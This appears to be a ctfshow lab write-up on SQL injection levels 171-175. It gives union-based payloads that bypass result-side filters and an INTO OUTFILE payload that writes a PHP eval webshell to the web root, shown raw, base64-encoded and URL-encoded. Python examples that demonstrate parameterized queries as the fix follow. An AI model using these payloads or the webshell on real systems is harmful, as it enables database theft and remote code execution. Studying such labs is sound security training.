SQL injection: look carefully at how many columns the query has; if that does not work, capture the request and try it (URL), or test locally.
171-175: the filtering is applied to the returned values, not to the query statement itself.
1. Closing the quote, escaping the string
// Concatenate the SQL statement that looks up the user with the given ID
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
-1' or id=' 26
9999' or id ='26
2. Union query: swap other columns into the result
// Concatenate the SQL statement that looks up the user with the given ID
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}
Union query; the username column must not contain "flag":
9999' union select id,password from ctfshows_user2 where username = 'flag
9999' union select b.id,b.password from ctfshow_user2 as b where b.username = 'flag
3. Union query, renaming the column, converting it to another representation (hex(), base64_encode())
// Concatenate the SQL statement that looks up the user with the given ID
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
Return logic:
// Check whether the result contains flag
if(!preg_match('/flag/i', json_encode($ret))){
    $ret['msg']='查询成功';
}
9999' union select hex(b.username),b.password from ctfshow_user3 as b where b.username = 'flag
9999' union select to_base64(b.username),b.password from ctfshow_user3 as b where b.username = 'flag
4. Substituting characters with the replace() function: replace(ori, query, alternative)
Query statement:
// Concatenate the SQL statement that looks up the user with the given ID
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}
The username and password are certainly strings, and the challenge says the result may not contain digits.
9999' union select 'a','b
(this is echoed back)
XXXXX
9999' union select to_base64(b.username),b.password from ctfshow_user4 as b where b.username = 'flag
replace(b.username,'1','!')
replace(replace(b.username,'1','!'),'2','@')
replace(replace(replace(b.username,'1','!'),'2','@'),'3','#')
replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$')
replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%')
replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^')
replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&')
replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*')
replace(replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','(')
replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(b.username,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','('),'0',')')
payload:
9999' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(b.password,'1','!'),'2','@'),'3','#'),'4','$'),'5','%'),'6','^'),'7','&'),'8','*'),'9','('),'0',')') from ctfshow_user4 as b where b.username = 'flag
Returned: ctfshow{!ba*@aba-e$!%-$@*d-a)d*-aba$b@#(^&$!}
After reversing the substitutions: ctfshow{1ba82aba-e415-428d-a0d8-aba4b2396741}
5. Writing a webshell file, the from_base64() function, URL encoding
// Concatenate the SQL statement that looks up the user with the given ID
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}
999' union select 'a',<?php eval($_POST[1]);?> into outfile '/var/www/html/1.php
999' union select 'a',from_base64("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+") into outfile '/var/www/html/1.php
payload:
%39%39%39%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%61%27%2c%66%72%6f%6d%5f%62%61%73%65%36%34%28%22%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b%22%29%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%0a
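All five levels share one root cause: the id is spliced into the SQL text and the only check runs on the returned row. The following is an added example, not code from the writeup or from ctfshow, written in Python against an in-memory SQLite table (a constructed stand-in for ctfshow_user2 with made-up rows) instead of MySQL. It places the concatenated query from level 172 next to a parameterized version, runs both on a normal id and on the union payload quoted above, and applies the level's own result-side check, so you can see that the check passes while the parameterized query simply returns nothing.

```python
import sqlite3

# Constructed stand-in for the challenge's ctfshow_user2 table; the real data is unknown.
SAMPLE_ROWS = [
    (1, "alice", "pw-alice"),
    (26, "bob", "pw-bob"),
    (27, "flag", "ctfshow{constructed-sample-secret}"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ctfshow_user2 (id integer, username text, password text)")
    conn.executemany("insert into ctfshow_user2 values (?,?,?)", SAMPLE_ROWS)
    return conn


def query_concat(conn, user_id):
    """Vulnerable form, mirroring the PHP above: the id is spliced into the SQL text,
    so a quote inside user_id closes the literal and the remainder is parsed as SQL."""
    sql = ("select username,password from ctfshow_user2 "
           "where username !='flag' and id = '" + user_id + "' limit 1;")
    return conn.execute(sql).fetchone()


def query_param(conn, user_id):
    """Hardened form: the id is bound as a parameter, so it can only ever be a value."""
    sql = ("select username,password from ctfshow_user2 "
           "where username !='flag' and id = ? limit 1;")
    return conn.execute(sql, (user_id,)).fetchone()


def result_check_172(row):
    """The level's result-side check: accept any row whose first column is not 'flag'.
    A union can place a different column in that slot, so passing this check says
    nothing about which rows the query actually read."""
    return row is not None and row[0] != "flag"


def run_demo():
    """Run both query forms on a normal id and on the writeup's union payload."""
    conn = make_db()
    payload = ("9999' union select b.id,b.password from ctfshow_user2 as b "
               "where b.username = 'flag")
    return {
        "concat_normal": query_concat(conn, "26"),
        "param_normal": query_param(conn, "26"),
        "concat_payload": query_concat(conn, payload),
        "param_payload": query_param(conn, payload),
        "check_passes_on_payload": result_check_172(query_concat(conn, payload)),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

With the bound parameter, SQLite compares the integer id column against the whole payload string as one value, finds no match and returns None; the row the output filter was supposed to protect is never read, so there is nothing to filter. Validating that the id is numeric before the query is a reasonable extra layer, but it is parameterization, not the regex on the response, that removes the injection.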
Supplement: [\x00-\x7f]
In a regular expression this character class denotes a range containing every character from \x00 to \x7f. These characters correspond to the ASCII character set. ASCII (American Standard Code for Information Interchange) is a computer character-encoding standard based on the Latin alphabet; it originally comprised 128 characters (code points), numbered 0 to 127.
Specifically, [\x00-\x7f] covers the following kinds of characters:
- Control characters: from \x00 (NUL, the null character) to \x1F (US, Unit Separator). These are used mainly to control devices or program behaviour rather than to be displayed or printed. For example, \x07 (BEL) may make the computer beep, while \x0A (LF, line feed) and \x0D (CR, carriage return) mark the end of a line in text files.
- Printable characters: from \x20 (space) to \x7E (tilde ~). These can be displayed or printed directly; they include the English letters (upper and lower case), digits, punctuation and the space:
  - space (\x20)
  - English letters (upper case \x41-\x5A, lower case \x61-\x7A)
  - digits (\x30-\x39)
  - punctuation (e.g. comma \x2C, full stop \x2E, question mark \x3F)
  - other special characters (e.g. plus \x2B, minus \x2D, equals \x3D)
- \x7F (DEL, the delete character) is a special control character; although it is not normally regarded as printable, it is still part of the ASCII set.
Note that ASCII contains only the basic Latin letters and some control characters; it does not include accented letters, characters of other scripts (Chinese, Japanese, Korean and so on) or emoji. Those need other encoding standards, such as Unicode (UTF-8, UTF-16 and UTF-32 are its encoding forms).
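To make the ranges in the supplement concrete, here is an added Python example (not from the writeup) that classifies code points into the sub-ranges listed above and mirrors the level-175 check by running `[\x00-\x7f]` over the UTF-8 bytes of a string, which is what PHP's PCRE sees without the /u modifier. The function names (classify, ascii_bytes_in, filter_rejects, summarize) are my own.

```python
import re

# Same character class as the PHP preg_match('/[\x00-\x7f]/i', ...), applied to bytes
# because PCRE without /u matches byte by byte; the /i flag does not change a byte range.
ASCII_CLASS = re.compile(rb"[\x00-\x7f]")


def classify(code_point):
    """Name the sub-range of [\x00-\x7f] a code point falls in, following the list above."""
    if code_point > 0x7F:
        return "non-ascii"       # accented letters, CJK, emoji: outside the class entirely
    if code_point == 0x7F:
        return "delete"          # DEL, a control character outside the printable run
    if code_point < 0x20:
        return "control"         # NUL .. US, including BEL, LF and CR
    if code_point == 0x20:
        return "space"
    if 0x30 <= code_point <= 0x39:
        return "digit"
    if 0x41 <= code_point <= 0x5A:
        return "upper"
    if 0x61 <= code_point <= 0x7A:
        return "lower"
    return "punctuation"         # the remaining printable characters: , . ? + - = ...


def ascii_bytes_in(text):
    """Return every UTF-8 byte of text that [\x00-\x7f] matches."""
    return [m.group(0) for m in ASCII_CLASS.finditer(text.encode("utf-8"))]


def filter_rejects(text):
    """True when the level-175 check fires, i.e. at least one ASCII byte is present."""
    return ASCII_CLASS.search(text.encode("utf-8")) is not None


def summarize(text):
    """Count how the characters of text are distributed over the classes above."""
    counts = {}
    for ch in text:
        name = classify(ord(ch))
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for sample in ["Hi 7!", "查询成功", '{"msg":"查询成功"}']:
        print(repr(sample), summarize(sample), "rejected:", filter_rejects(sample))
```

Every UTF-8 byte of a Chinese string is 0x80 or above, so "查询成功" alone never matches, while the braces and quotes that json_encode always emits are ASCII and match on every response. A check of this shape therefore either blocks all output or none of it; it does not constrain what the query reads, which is why the fix belongs in the query (parameter binding) rather than in a regex on the result.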